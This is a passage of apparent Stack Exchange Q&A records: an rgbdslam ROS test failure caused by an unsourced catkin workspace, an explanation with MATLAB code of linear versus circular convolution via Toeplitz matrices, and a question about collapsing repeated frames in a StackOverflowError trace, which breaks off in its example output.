14:34:33 Results for rgbd_dataset_freiburg1_xyz are stored in /home/elizeu/rgbdslam_catkin_ws/src/rgbdslam_v2-indigo/test/[rgbd_dataset_freiburg1_xyz.bag]/emm__0.00/CANDIDATES_4/RANSAC_100/OPT_SKIP_10/ORB/600_Features/rgbd_dataset_freiburg1_xyz
14:34:33 Finished processing rgbd_dataset_freiburg1_xyz
mv: cannot stat ‘rgbd_dataset_freiburg1_xyz.bag?’: No such file or directory
cp: cannot stat ‘rgbd_dataset_freiburg1_xyz-groundtruth.txt’: No such file or directory
cp: cannot stat ‘/test/test_settings.launch’: No such file or directory
./run_tests.sh: line 70: //rgbd_benchmark/summarize_evaluation.sh: No such file or directory
elizeu@elizeu:~/rgbdslam_catkin_ws/src/rgbdslam_v2-indigo/test$ rosrun rgbdslam summarize_evaluation.sh /home/elizeu/rgbdslam_catkin_ws/src/rgbdslam_v2-indigo/test/[rgbd_dataset_freiburg1_xyz.bag]/emm__0.00/CANDIDATES_4/RANSAC_100/OPT_SKIP_10/ORB/600_Features/rgbd_dataset_freiburg1_xyz
[rospack] Error: package 'rgbdslam' not found
elizeu@elizeu:~/rgbdslam_catkin_ws/src/rgbdslam_v2-indigo/test$ ./run_tests.sh [rgbd_dataset_freiburg1_xyz.bag][rospack] Error: package 'rgbdslam' not found
Evaluating ORB
Will evaluate RGBD-SLAM on the following bagfiles:
ORB_home_newcalibpar.bag rgbd_dataset_freiburg1_desk.bag rgbd_dataset_freiburg1_xyz.bag
[rospack] Error: package 'rgbdslam' not found
14:52:42 Results for ORB_home_newcalibpar are stored in /home/elizeu/rgbdslam_catkin_ws/src/rgbdslam_v2-indigo/test/[rgbd_dataset_freiburg1_xyz.bag]/emm__0.00/CANDIDATES_4/RANSAC_100/OPT_SKIP_10/ORB/600_Features/ORB_home_newcalibpar
14:52:42 Finished processing ORB_home_newcalibpar
mv: cannot stat ‘ORB_home_newcalibpar.bag?’: No such file or directory
cp: cannot stat ‘ORB_home_newcalibpar-groundtruth.txt’: No such file or directory
cp: cannot stat ‘/test/test_settings.launch’: No such file or directory
[rospack] Error: package 'rgbdslam' not found
14:52:42 Results for rgbd_dataset_freiburg1_desk are stored in /home/elizeu/rgbdslam_catkin_ws/src/rgbdslam_v2-indigo/test/[rgbd_dataset_freiburg1_xyz.bag]/emm__0.00/CANDIDATES_4/RANSAC_100/OPT_SKIP_10/ORB/600_Features/rgbd_dataset_freiburg1_desk
14:52:42 Finished processing rgbd_dataset_freiburg1_desk
mv: cannot stat ‘rgbd_dataset_freiburg1_desk.bag?’: No such file or directory
cp: cannot stat ‘rgbd_dataset_freiburg1_desk-groundtruth.txt’: No such file or directory
cp: cannot stat ‘/test/test_settings.launch’: No such file or directory
[rospack] Error: package 'rgbdslam' not found
14:52:42 Results for rgbd_dataset_freiburg1_xyz are stored in /home/elizeu/rgbdslam_catkin_ws/src/rgbdslam_v2-indigo/test/[rgbd_dataset_freiburg1_xyz.bag]/emm__0.00/CANDIDATES_4/RANSAC_100/OPT_SKIP_10/ORB/600_Features/rgbd_dataset_freiburg1_xyz
14:52:42 Finished processing rgbd_dataset_freiburg1_xyz
mv: cannot stat ‘rgbd_dataset_freiburg1_xyz.bag?’: No such file or directory
cp: cannot stat ‘rgbd_dataset_freiburg1_xyz-groundtruth.txt’: No such file or directory
cp: cannot stat ‘/test/test_settings.launch’: No such file or directory
[rospack] Error: package 'rgbdslam' not found
rgbd_dataset_freiburg1_desk ... No estimate at level 0
rgbd_dataset_freiburg1_xyz ... No estimate at level 0
paste: eval_translational.ate.txt: No such file or directory
ATE Results at Level 0 are stored in /home/elizeu/rgbdslam_catkin_ws/src/rgbdslam_v2-indigo/test/[rgbd_dataset_freiburg1_xyz.bag]/emm__0.00/CANDIDATES_4/RANSAC_100/OPT_SKIP_10/ORB/600_Features/maxate_evaluation_0.csv
600 Features "ATE MAX" "Duration" "Optimization Time" Nodes Edges
rgbd_dataset_freiburg1_desk ... No estimate at level 1
rgbd_dataset_freiburg1_xyz ... No estimate at level 1
paste: eval_translational.ate.txt: No such file or directory
ATE Results at Level 1 are stored in /home/elizeu/rgbdslam_catkin_ws/src/rgbdslam_v2-indigo/test/[rgbd_dataset_freiburg1_xyz.bag]/emm__0.00/CANDIDATES_4/RANSAC_100/OPT_SKIP_10/ORB/600_Features/maxate_evaluation_1.csv
600 Features "ATE MAX" "Duration" "Optimization Time" Nodes Edges
rgbd_dataset_freiburg1_desk ... No estimate at level 2
rgbd_dataset_freiburg1_xyz ... No estimate at level 2
paste: eval_translational.ate.txt: No such file or directory
ATE Results at Level 2 are stored in /home/elizeu/rgbdslam_catkin_ws/src/rgbdslam_v2-indigo/test/[rgbd_dataset_freiburg1_xyz.bag]/emm__0.00/CANDIDATES_4/RANSAC_100/OPT_SKIP_10/ORB/600_Features/maxate_evaluation_2.csv
600 Features "ATE MAX" "Duration" "Optimization Time" Nodes Edges
rgbd_dataset_freiburg1_desk ... No estimate at level 3
rgbd_dataset_freiburg1_xyz ... No estimate at level 3
paste: eval_translational.ate.txt: No such file or directory
ATE Results at Level 3 are stored in /home/elizeu/rgbdslam_catkin_ws/src/rgbdslam_v2-indigo/test/[rgbd_dataset_freiburg1_xyz.bag]/emm__0.00/CANDIDATES_4/RANSAC_100/OPT_SKIP_10/ORB/600_Features/maxate_evaluation_3.csv
600 Features "ATE MAX" "Duration" "Optimization Time" Nodes Edges
rgbd_dataset_freiburg1_desk ... No estimate at level 4
rgbd_dataset_freiburg1_xyz ... No estimate at level 4
paste: eval_translational.ate.txt: No such file or directory
ATE Results at Level 4 are stored in /home/elizeu/rgbdslam_catkin_ws/src/rgbdslam_v2-indigo/test/[rgbd_dataset_freiburg1_xyz.bag]/emm__0.00/CANDIDATES_4/RANSAC_100/OPT_SKIP_10/ORB/600_Features/maxate_evaluation_4.csv
600 Features "ATE MAX" "Duration" "Optimization Time" Nodes Edges
elizeu@elizeu:~/rgbdslam_catkin_ws/src/rgbdslam_v2-indigo/test$ /home/elizeu/rgbdslam_catkin_ws/src/rgbdslam_v2-indigoclear
bash: /home/elizeu/rgbdslam_catkin_ws/src/rgbdslam_v2-indigoclear: No such file or directory
elizeu@elizeu:~/rgbdslam_catkin_ws/src/rgbdslam_v2-indigo/test$ clear
Originally posted by elizeu_jr on ROS Answers with karma: 11 on 2016-11-14
Post score: 0
Answer:
The first (and possibly only) problem is package 'rgbdslam' not found. This means that ROS does not know about the rgbdslam package. This problem has been asked before.
If you have rgbdslam in a catkin workspace somewhere, make sure you have built it (with catkin_make install) and sourced it (with source path/to/workspace/devel/setup.bash).
If that error goes away and it still doesn't work, the bag/ground truth files may be in the wrong place. The error messages should tell you where they are expected!
Originally posted by petern3 with karma: 186 on 2016-11-23
This answer was ACCEPTED on the original site
Post score: 0 | {
"domain": "robotics.stackexchange",
"id": 26249,
"tags": "ros, rgbdslam-v2, rgbd"
} |
linear convolution toeplitz matrix vs circular convolution toeplitz matrix | Question: I have trouble understanding the difference between building the Toeplitz matrix when the convolution is linear and when it is circular. As far as I know, the Toeplitz matrix $H$ can be built as follows
H = toeplitz([h; zeros(N-L,1)], [h(1), zeros(1,N-1)]);
where h is the channel and L is the length of the channel, and N is the total length of symbol convoluted with the channel.
My question, if the convolution with the channel is circular, will the Toeplitz matrix still be built in the same way?
Answer: They are in general different. For two signals of lengths $N$ and $M$, linear and circular convolution are equivalent if the output is specified to be of length $N + M - 1$ with the appropriate padding. Convolution via the DFT is inherently circular, which is why padding must be done before the inverse DFT to yield the linear convolution. So, this is a special case where they are the same.
If your goal is to always yield linear convolution, then don't bother forming a circular Toeplitz matrix: the regular Toeplitz matrix gives the same result and is simpler to construct.
Below is some sample code and output where we form regular and circular Toeplitz matrices with a specified output of length $N + M - 1$:
%% Toeplitz Convolution
x = [1 8 3 2 5];
h = [3 4 1];
% Form the row and column vectors for the Toeplitz matrix
r = [h zeros(1, length(x) - 1)];
c = [h(1) zeros(1, length(x) - 1)];
% Toeplitz matrix
hConv = toeplitz(c,r)
% Compare the two types of convolutions
y1 = x*hConv
y2 = conv(x, h)
hConv =
3 4 1 0 0 0 0
0 3 4 1 0 0 0
0 0 3 4 1 0 0
0 0 0 3 4 1 0
0 0 0 0 3 4 1
y1 =
3 28 42 26 26 22 5
y2 =
3 28 42 26 26 22 5
%% Toeplitz Circular Convolution
% Convolution length
n = length(x) + length(h) - 1;
numElementDiff = n - length(h);
% Set up the circular Toeplitz matrix
c = [h(1) fliplr([h(2:end) zeros(1, numElementDiff)])];
hConvCirc = toeplitz(c, [h zeros(1, numElementDiff)])
% Compare the two types of convolutions
y1 = [x zeros(1, length(c) - length(x))]*hConvCirc
y2 = cconv(x, h, n)
hConvCirc =
3 4 1 0 0 0 0
0 3 4 1 0 0 0
0 0 3 4 1 0 0
0 0 0 3 4 1 0
0 0 0 0 3 4 1
1 0 0 0 0 3 4
4 1 0 0 0 0 3
y1 =
3 28 42 26 26 22 5
y2 =
3.0000 28.0000 42.0000 26.0000 26.0000 22.0000 5.0000
Here we're testing three things:
Linear convolution conv() is equivalent to performing the matrix multiplication with the appropriate Toeplitz matrix.
Circular convolution cconv() is equivalent to performing the matrix multiplication with the appropriate circular Toeplitz matrix.
Output length is specified as $N + M - 1$, so we see that linear and circular convolution are equivalent.
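The same length-$N + M - 1$ equivalence can also be cross-checked outside MATLAB. Here is a small Python/NumPy sketch (an addition for illustration, not part of the original answer), using the DFT to perform the circular convolution:

```python
import numpy as np

# Same signals as in the MATLAB example above.
x = np.array([1, 8, 3, 2, 5])
h = np.array([3, 4, 1])
n = len(x) + len(h) - 1  # output length N + M - 1

# Linear convolution.
y_lin = np.convolve(x, h)

# Circular convolution of length n via the DFT; zero-padding both
# signals to n makes it equal to the linear convolution.
y_circ = np.fft.ifft(np.fft.fft(x, n) * np.fft.fft(h, n)).real

print(y_lin)                        # [ 3 28 42 26 26 22  5]
print(np.allclose(y_lin, y_circ))   # True
```

Without the zero-padding (e.g. circular convolution of length 5), the wrap-around terms would make the two results differ.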
If you are going to perform circular convolution of varying sizes, then you must form the Toeplitz matrix differently. This usually involves some type of padding with the matrix entries themselves or the signal(s) being operated on. Mathworks has a good summary of Toeplitz matrices here and linear vs circular convolution here. | {
"domain": "dsp.stackexchange",
"id": 9413,
"tags": "matlab, digital-communications, convolution, matrix"
} |
Why does the Feistel encryption algorithm encode half a block every time? | Question: Why does the Feistel encryption algorithm encode half a block every time? What would happen if the entire block were encrypted in each step?
Answer: You can't. Some of the block is used as the input to the F function, and the rest is modified. Those can't overlap. If you wanted to modify all of the block, there wouldn't be any input to the F function.
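A minimal Python sketch (added for illustration, with a deliberately toy and insecure F function) makes this concrete: each round uses one half as input to F, XORs F's output into the other half, and then swaps the halves, which is exactly why decryption works without ever inverting F.

```python
def feistel_round(left, right, round_key, f):
    # The right half is the input to F; only the left half is
    # modified, then the halves swap roles for the next round.
    return right, left ^ f(right, round_key)

def feistel_unround(left, right, round_key, f):
    # Undo one round: recompute f on the same input and XOR again.
    return right ^ f(left, round_key), left

def toy_f(half, key):
    # Toy, insecure round function -- purely for illustration.
    return ((half * 31) ^ key) & 0xFFFF

L, R = 0x1234, 0x5678
keys = [0x0F0F, 0x3C3C, 0xA5A5]

for k in keys:               # encrypt: apply rounds in order
    L, R = feistel_round(L, R, k, toy_f)
for k in reversed(keys):     # decrypt: undo rounds in reverse order
    L, R = feistel_unround(L, R, k, toy_f)

print(hex(L), hex(R))  # round trip recovers the original block
```

Note that `toy_f` need not be invertible: decryption only ever evaluates it forward, on the same half-block it was evaluated on during encryption.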
You might be interested in https://en.wikipedia.org/wiki/Feistel_cipher#Unbalanced_Feistel_cipher | {
"domain": "cs.stackexchange",
"id": 13899,
"tags": "cryptography, encryption"
} |
Binary Search Tree (BST) Implementation | Question: This is the first time I am implementing a Binary Search Tree, based on how it works on the visualgo website. I made this algorithm purely based on what I saw, and the remove method was quite challenging. How can I improve the speed/efficiency and make the code look better?
Methods:
Inorder: basically an inorder traversal through the BST Ex: 1 3 4 6 19 25
Insert: inserts a node with a certain value
lookup: returns the value if it exists in the BST else returns None
getMin: returns the min value in the specified node
remove: removes a value; if current_node is not specified, it starts from the root node. It is a bit recursive; I wanted to implement it without recursion, but I couldn't see it working without it in any way.
class Node:
def __init__(self, value):
self.value = value
self.left = None
self.right = None
class BinarySearchTree:
def __init__(self):
self.root = None
def inorder(self, current_node):
if current_node:
self.inorder(current_node.left)
print(current_node.value, end=' ')
self.inorder(current_node.right)
def insert(self, value):
NewNode = Node(value)
current_node = self.root
if current_node is None:
self.root = NewNode
else:
while True:
if value < current_node.value:
#Left
if not current_node.left:
current_node.left = NewNode
return self
current_node = current_node.left
else:
if not current_node.right:
current_node.right = NewNode
return self
current_node = current_node.right
def lookup(self, value):
current_node = self.root
if current_node is None:
return None
while current_node:
current_value = current_node.value
if value < current_value:
current_node = current_node.left
elif value > current_value:
current_node = current_node.right
else:
return current_node
def getMin(self, current_node):
while current_node.left is not None:
current_node = current_node.left
return current_node.value
def remove(self, value, current_node=False):
if not current_node:
current_node = self.root
if not current_node: # if the root is None
return None
parent_node = None
while current_node:
current_value = current_node.value
if value < current_value:
parent_node = current_node
current_node = current_node.left
elif value > current_value:
parent_node = current_node
current_node = current_node.right
else:
# No Child
if not current_node.left and not current_node.right:
if parent_node is None:
self.root = None
elif current_node == parent_node.left:
parent_node.left = None
else:
parent_node.right = None
# One Child
elif current_node.right and not current_node.left:
if parent_node is None:
self.root = current_node.right
elif current_node == parent_node.left:
parent_node.left = current_node.right
else:
parent_node.right = current_node.right
elif current_node.left and not current_node.right:
if parent_node is None:
self.root = current_node.left
elif current_node == parent_node.left:
parent_node.left = current_node.left
else:
parent_node.right = current_node.left
# Two Child
else:
in_order_successor = self.getMin(current_node.right)
self.remove(in_order_successor, current_node)
if parent_node is None:
self.root.value = in_order_successor
elif current_node == parent_node.left:
parent_node.left.value = in_order_successor
else:
parent_node.right.value = in_order_successor
return True # if removed
return False # if value doesnt exist
Answer:
How can I…make the code look better?
Follow the Style Guide for Python Code.
Add docstrings, at least for "everything to be used externally".
Add (doc)tests. Or, at least, a start for tinkering:
if __name__ == "__main__":
t = BinarySearchTree()
for c in "badcef":
t.insert(c)
t.remove("d")
provide amenities like an __str__ for node
def is_leaf(self):
return self.left is None and self.right is None
def __str__(self):
return "(" + (self.value if self.is_leaf() else (
(str(self.left.value + "<") if self.left else "^")
+ self.value
+ ("<" + str(self.right.value) if self.right else "^"))) + ")"
(It is somewhat rare that I don't provide docstrings. It felt right here.)
Keep classes and functions short.
Say, 24 lines for "heads", 48 for a function body, 96 for a class.
Where not impeding readability, keep nesting level low.
This includes early outs, continues, breaks & else in loops; returns
def insert(self, value):
""" Insert value into this tree.
ToDo: document behaviour with identical keys
(what about lookup()?)
"""
latest = Node(value)
current = self.root
previous = None # the parent for latest, if any
left = None # the child latest is going to be in parent
while current is not None:
previous = current
left = value < current.value
current = current.left if left else current.right
if previous is None:
self.root = latest
elif left:
previous.left = latest
else:
previous.right = latest
return self
(what an awful example for changing entirely too many things at once)
Python naming style is CapWords for classes, only: that would be new_node.
The left = None statement is there for the comment.
The paranoid prefer is None/is not None over just using what should be a reference in a boolean context.
Above rendition tries to keep DRY and avoids some of what looks repetitious in the insert() you presented.
But, wait, doesn't that descend left or right thing look just the same in lookup() and remove()?
If I had a method
def _find(self, value):
""" Find node with value, if any.
Return this node and setter for (re-)placing it in this tree.
"""
pass
, insert() was simple, and lookup() trivial (though questionable: the wording promises
• lookup: returns the value if it exists in the BST else returns None
, while the implementation returns a Node):
def insert(self, value):
""" Insert value into this tree.
ToDo: document behaviour with identical keys
"""
existing, place = self._find(value)
if existing is not None:
pass
place(Node(value))
return self
def lookup(self, value):
""" Return node with value, if any. """
return self._find(value)[0]
Remove can profit from a modified successor method
@staticmethod
def leftmost(child, parent=None):
""" Return the leftmost node of the tree rooted at child,
and its parent, if any. """
if child is not None:
while child.left is not None:
child, parent = child.left, child
return child, parent
def deleted(self, node): # node None?
""" Return root of a tree with node's value deleted. """
successor, parent = BinarySearchTree.leftmost(node.right, node)
if successor is None:
return node.left
node.value = successor.value
if node is not parent:
parent.left = successor.right
else:
node.right = successor.right
return node
def remove(self, value):
""" Remove value.
Return 'tree contained value'. """
node, place = self._find(value)
if node is None:
return False
place(self.deleted(node))
return True
My current rendition of _find() adds in Node
def _set_left(self, v):
self.left = v
def _set_right(self, v):
self.right = v
, in BinarySearchTree
def _set_root(self, v):
self.root = v
def _find(self, value):
""" Find node with value, if any.
Return this node and setter for (re-)placing it in this tree.
"""
if self.root is None or self.root.value == value:
return self.root, self._set_root
child = self.root
while True:
node = child
smaller = value < child.value
child = child.left if smaller else child.right
if child is None or child.value == value:
return child, node._set_left if smaller else node._set_right
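For reference, the pieces above can be assembled into one self-contained sketch (my assembly of the snippets, assuming distinct keys as flagged in the ToDo; the inorder() helper exists only for the demo):

```python
class Node:
    def __init__(self, value):
        self.value = value
        self.left = None
        self.right = None

    def _set_left(self, v):
        self.left = v

    def _set_right(self, v):
        self.right = v


class BinarySearchTree:
    def __init__(self):
        self.root = None

    def _set_root(self, v):
        self.root = v

    def _find(self, value):
        """Find node with value, if any.
        Return this node and a setter for (re-)placing it."""
        if self.root is None or self.root.value == value:
            return self.root, self._set_root
        child = self.root
        while True:
            node = child
            smaller = value < child.value
            child = child.left if smaller else child.right
            if child is None or child.value == value:
                return child, node._set_left if smaller else node._set_right

    def insert(self, value):  # assumes value is not already present
        _, place = self._find(value)
        place(Node(value))
        return self

    def lookup(self, value):
        return self._find(value)[0]

    @staticmethod
    def leftmost(child, parent=None):
        """Return the leftmost node of the tree rooted at child, and its parent."""
        if child is not None:
            while child.left is not None:
                child, parent = child.left, child
        return child, parent

    def deleted(self, node):
        """Return root of a tree with node's value deleted."""
        successor, parent = BinarySearchTree.leftmost(node.right, node)
        if successor is None:
            return node.left
        node.value = successor.value
        if node is not parent:
            parent.left = successor.right
        else:
            node.right = successor.right
        return node

    def remove(self, value):
        node, place = self._find(value)
        if node is None:
            return False
        place(self.deleted(node))
        return True


def inorder(node):
    """Demo helper: collect values in sorted order."""
    return inorder(node.left) + [node.value] + inorder(node.right) if node else []


t = BinarySearchTree()
for v in [6, 3, 19, 1, 4, 25]:
    t.insert(v)
print(inorder(t.root))  # sorted: [1, 3, 4, 6, 19, 25]
t.remove(6)             # remove the root, which has two children
print(inorder(t.root))  # [1, 3, 4, 19, 25]
```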
How can I improve the speed/efficiency?
Don't spend effort there before measurements suggesting it's a bottleneck.
Guide-line for easy-to-use types: Don't make me think.
You define inorder() to print the values in order.
Wouldn't it be cute to be able to use, for a tree ascending,
for item in ascending: …? While it would be possible to not touch Node, add
def __iter__(self):
""" Yield each node in the tree rooted here in order. """
if self.left is not None:
yield from self.left
yield self.value
if self.right is not None:
yield from self.right
there, and in the tree
def __iter__(self):
""" Yield each node in the tree in order. """
if self.root is not None:
yield from self.root
, enabling print(*ascending) | {
"domain": "codereview.stackexchange",
"id": 42323,
"tags": "python, python-3.x, linked-list, binary-search-tree"
} |
Show that $\lambda |\phi^+\rangle \langle\phi^+| + (1-\lambda )|\phi^-\rangle \langle\phi^-|$ is the Choi–Jamiołkowski matrix of a quantum channel | Question: I'm curious how to show that this matrix:
$$c = \lambda |\phi^+\rangle \langle\phi^+| + (1-\lambda )|\phi^-\rangle \langle\phi^-|$$
is the Choi–Jamiołkowski matrix of a quantum channel for any $\lambda \in [0,1]$.
Answer: I'll use notation inspired from Watrous' book. Let $\Phi:\mathrm{Lin}(\mathcal X)\to\mathrm{Lin}(\mathcal Y)$ be a quantum channel (i.e. a CPTP map).
Define its Choi representation as the operator $J(\Phi)\in\mathrm{Lin}(\mathcal Y\otimes\mathcal X)$ defined by
$$J(\Phi) = \sum_{ij} \Phi(E_{ij})\otimes E_{ij},\qquad E_{ij}\equiv |i\rangle\!\langle j|.$$
Then you can verify that $J(\Phi)\ge0$ and $\operatorname{Tr}_{\mathcal Y}(J(\Phi))=I_{\mathcal X}$.
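Both properties can be checked numerically for a concrete channel. The sketch below (an addition, using a dephasing channel with Kraus operators $\sqrt p\, I$ and $\sqrt{1-p}\, Z$ as an illustrative assumption) builds $J(\Phi)$ exactly as defined above:

```python
import numpy as np

def choi(kraus_ops, d=2):
    """J(Phi) = sum_ij Phi(E_ij) (x) E_ij, unnormalised convention."""
    J = np.zeros((d * d, d * d), dtype=complex)
    for i in range(d):
        for j in range(d):
            E = np.zeros((d, d))
            E[i, j] = 1.0
            phi_E = sum(K @ E @ K.conj().T for K in kraus_ops)
            J += np.kron(phi_E, E)  # output (Y) factor first
    return J

# Illustrative channel: dephasing, applying Z with probability 1 - p.
p = 0.7
I2 = np.eye(2)
Z = np.diag([1.0, -1.0])
J = choi([np.sqrt(p) * I2, np.sqrt(1 - p) * Z])

# J(Phi) >= 0 ...
assert np.linalg.eigvalsh(J).min() > -1e-12
# ... and Tr_Y(J(Phi)) = I_X (trace out the first factor).
r = J.reshape(2, 2, 2, 2)
assert np.allclose(np.einsum('ijik->jk', r), I2)
print("CPTP conditions verified")
```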
Vice versa, let $A\in\mathrm{Lin}(\mathcal Y\otimes\mathcal X)$ be a positive semidefinite linear operator such that $\operatorname{Tr}_{\mathcal Y}(A)=I_{\mathcal X}$, and define the linear map $\Phi_A\in\mathrm{Lin}(\mathrm{Lin}(\mathcal X),\mathrm{Lin}(\mathcal Y))$ via
$$\Phi_A(E_{j\ell}) \equiv \sum_{ik} \langle i,j|A|k,\ell\rangle E_{ik},
\qquad \Phi_A(X) = \operatorname{Tr}_{\mathcal X}[A(I\otimes X^T)].$$
You can then verify that $\Phi_A$ is CPTP.
Moreover, the two operations are inverses of each other: $\Phi_{J(\Phi)}=\Phi$.
In conclusion, a linear operator $A\in\mathrm{Lin}(\mathcal Y\otimes\mathcal X)$ is the Choi of a CPTP map iff it is positive semidefinite and satisfies the trace property.
In this case, verifying the positivity is immediate. Moreover, assuming $|\phi^\pm\rangle$ here denote maximally entangled states, the partial trace gives the identity for both terms, and thus the other condition is also trivially verified for all $\lambda\in[0,1]$.
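For the state in the question specifically, here is a quick numerical check (my addition; it uses normalised Bell states, so the reduced state comes out as $I/2$ rather than $I$, in line with the normalisation caveat in this answer):

```python
import numpy as np

# Normalised Bell states |phi+>, |phi-> as vectors in C^4.
phi_plus = (np.kron([1.0, 0.0], [1.0, 0.0]) + np.kron([0.0, 1.0], [0.0, 1.0])) / np.sqrt(2)
phi_minus = (np.kron([1.0, 0.0], [1.0, 0.0]) - np.kron([0.0, 1.0], [0.0, 1.0])) / np.sqrt(2)

def c(lam):
    return lam * np.outer(phi_plus, phi_plus) + (1 - lam) * np.outer(phi_minus, phi_minus)

def trace_out_first(rho, d=2):
    # Partial trace over the first factor of a (d*d) x (d*d) matrix.
    return np.einsum('ijik->jk', rho.reshape(d, d, d, d))

for lam in [0.0, 0.3, 0.5, 1.0]:
    rho = c(lam)
    assert np.linalg.eigvalsh(rho).min() > -1e-12            # positive semidefinite
    assert np.allclose(trace_out_first(rho), np.eye(2) / 2)  # marginal is I/2
print("conditions hold for all tested lambda")
```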
I should note that the definition I'm using here of "Choi representation" isn't a state, in that it's not normalised: $\mathrm{Tr}(J(\Phi))=\operatorname{dim}(\mathcal X)$. This is however trivially fixed by adding the appropriate normalisation factor in the definition. | {
"domain": "quantumcomputing.stackexchange",
"id": 2511,
"tags": "textbook-and-exercises, quantum-operation"
} |
Algorithm to identify contiguous repeated series of lines in a long string | Question: I would like an algorithm that can identify repeated parts of big stack traces like this:
java.lang.StackOverflowError
at transform.Erasure$Eraser.typed1(Erasure.scala:789)
at typechecker.Typers$Typer.runTyper$1(Typers.scala:5640)
at typechecker.Typers$Typer.typedInternal(Typers.scala:5672)
at typechecker.Typers$Typer.body$2(Typers.scala:5613)
at typechecker.Typers$Typer.typed(Typers.scala:5618)
at typechecker.Typers$Typer.$anonfun$typed1$38(Typers.scala:4752)
at typechecker.Typers$Typer.silent(Typers.scala:700)
at typechecker.Typers$Typer.normalTypedApply$1(Typers.scala:4754)
at typechecker.Typers$Typer.typedApply$1(Typers.scala:4801)
at typechecker.Typers$Typer.typedInAnyMode$1(Typers.scala:5586)
at typechecker.Typers$Typer.typed1(Typers.scala:5603)
at transform.Erasure$Eraser.typed1(Erasure.scala:789)
at typechecker.Typers$Typer.runTyper$1(Typers.scala:5640)
at typechecker.Typers$Typer.typedInternal(Typers.scala:5672)
at typechecker.Typers$Typer.body$2(Typers.scala:5613)
at typechecker.Typers$Typer.typed(Typers.scala:5618)
at typechecker.Typers$Typer.typedQualifier(Typers.scala:5723)
at typechecker.Typers$Typer.typedQualifier(Typers.scala:5731)
at transform.Erasure$Eraser.adaptMember(Erasure.scala:714)
at transform.Erasure$Eraser.typed1(Erasure.scala:789)
at typechecker.Typers$Typer.runTyper$1(Typers.scala:5640)
at typechecker.Typers$Typer.typedInternal(Typers.scala:5672)
at typechecker.Typers$Typer.body$2(Typers.scala:5613)
at typechecker.Typers$Typer.typed(Typers.scala:5618)
at typechecker.Typers$Typer.$anonfun$typed1$38(Typers.scala:4752)
at typechecker.Typers$Typer.silent(Typers.scala:700)
at typechecker.Typers$Typer.normalTypedApply$1(Typers.scala:4754)
at typechecker.Typers$Typer.typedApply$1(Typers.scala:4801)
at typechecker.Typers$Typer.typedInAnyMode$1(Typers.scala:5586)
at typechecker.Typers$Typer.typed1(Typers.scala:5603)
at transform.Erasure$Eraser.typed1(Erasure.scala:789)
at typechecker.Typers$Typer.runTyper$1(Typers.scala:5640)
at typechecker.Typers$Typer.typedInternal(Typers.scala:5672)
at typechecker.Typers$Typer.body$2(Typers.scala:5613)
at typechecker.Typers$Typer.typed(Typers.scala:5618)
at typechecker.Typers$Typer.typedQualifier(Typers.scala:5723)
at typechecker.Typers$Typer.typedQualifier(Typers.scala:5731)
at transform.Erasure$Eraser.adaptMember(Erasure.scala:714)
at transform.Erasure$Eraser.typed1(Erasure.scala:789)
at typechecker.Typers$Typer.runTyper$1(Typers.scala:5640)
at typechecker.Typers$Typer.typedInternal(Typers.scala:5672)
at typechecker.Typers$Typer.body$2(Typers.scala:5613)
at typechecker.Typers$Typer.typed(Typers.scala:5618)
at typechecker.Typers$Typer.$anonfun$typed1$38(Typers.scala:4752)
at typechecker.Typers$Typer.silent(Typers.scala:700)
at typechecker.Typers$Typer.normalTypedApply$1(Typers.scala:4754)
at typechecker.Typers$Typer.typedApply$1(Typers.scala:4801)
at typechecker.Typers$Typer.typedInAnyMode$1(Typers.scala:5586)
at typechecker.Typers$Typer.typed1(Typers.scala:5603)
at transform.Erasure$Eraser.typed1(Erasure.scala:789)
at typechecker.Typers$Typer.runTyper$1(Typers.scala:5640)
at typechecker.Typers$Typer.typedInternal(Typers.scala:5672)
at typechecker.Typers$Typer.body$2(Typers.scala:5613)
at typechecker.Typers$Typer.typed(Typers.scala:5618)
at typechecker.Typers$Typer.typedQualifier(Typers.scala:5723)
at typechecker.Typers$Typer.typedQualifier(Typers.scala:5731)
at transform.Erasure$Eraser.adaptMember(Erasure.scala:714)
at transform.Erasure$Eraser.typed1(Erasure.scala:789)
at typechecker.Typers$Typer.runTyper$1(Typers.scala:5640)
at typechecker.Typers$Typer.typedInternal(Typers.scala:5672)
at typechecker.Typers$Typer.body$2(Typers.scala:5613)
at typechecker.Typers$Typer.typed(Typers.scala:5618)
at typechecker.Typers$Typer.$anonfun$typed1$38(Typers.scala:4752)
With a bit of inspection, it's clear that this segment is being repeated three times:
at typechecker.Typers$Typer.runTyper$1(Typers.scala:5640)
at typechecker.Typers$Typer.typedInternal(Typers.scala:5672)
at typechecker.Typers$Typer.body$2(Typers.scala:5613)
at typechecker.Typers$Typer.typed(Typers.scala:5618)
at typechecker.Typers$Typer.$anonfun$typed1$38(Typers.scala:4752)
at typechecker.Typers$Typer.silent(Typers.scala:700)
at typechecker.Typers$Typer.normalTypedApply$1(Typers.scala:4754)
at typechecker.Typers$Typer.typedApply$1(Typers.scala:4801)
at typechecker.Typers$Typer.typedInAnyMode$1(Typers.scala:5586)
at typechecker.Typers$Typer.typed1(Typers.scala:5603)
at transform.Erasure$Eraser.typed1(Erasure.scala:789)
at typechecker.Typers$Typer.runTyper$1(Typers.scala:5640)
at typechecker.Typers$Typer.typedInternal(Typers.scala:5672)
at typechecker.Typers$Typer.body$2(Typers.scala:5613)
at typechecker.Typers$Typer.typed(Typers.scala:5618)
at typechecker.Typers$Typer.typedQualifier(Typers.scala:5723)
at typechecker.Typers$Typer.typedQualifier(Typers.scala:5731)
at transform.Erasure$Eraser.adaptMember(Erasure.scala:714)
at transform.Erasure$Eraser.typed1(Erasure.scala:789)
The end goal is to be able to print out stack traces of recursive functions in a nicer fashion:
java.lang.StackOverflowError
at transform.Erasure$Eraser.typed1(Erasure.scala:789)
------------------------- Repeated 3x -------------------------
at typechecker.Typers$Typer.runTyper$1(Typers.scala:5640)
at typechecker.Typers$Typer.typedInternal(Typers.scala:5672)
at typechecker.Typers$Typer.body$2(Typers.scala:5613)
at typechecker.Typers$Typer.typed(Typers.scala:5618)
at typechecker.Typers$Typer.$anonfun$typed1$38(Typers.scala:4752)
at typechecker.Typers$Typer.silent(Typers.scala:700)
at typechecker.Typers$Typer.normalTypedApply$1(Typers.scala:4754)
at typechecker.Typers$Typer.typedApply$1(Typers.scala:4801)
at typechecker.Typers$Typer.typedInAnyMode$1(Typers.scala:5586)
at typechecker.Typers$Typer.typed1(Typers.scala:5603)
at transform.Erasure$Eraser.typed1(Erasure.scala:789)
at typechecker.Typers$Typer.runTyper$1(Typers.scala:5640)
at typechecker.Typers$Typer.typedInternal(Typers.scala:5672)
at typechecker.Typers$Typer.body$2(Typers.scala:5613)
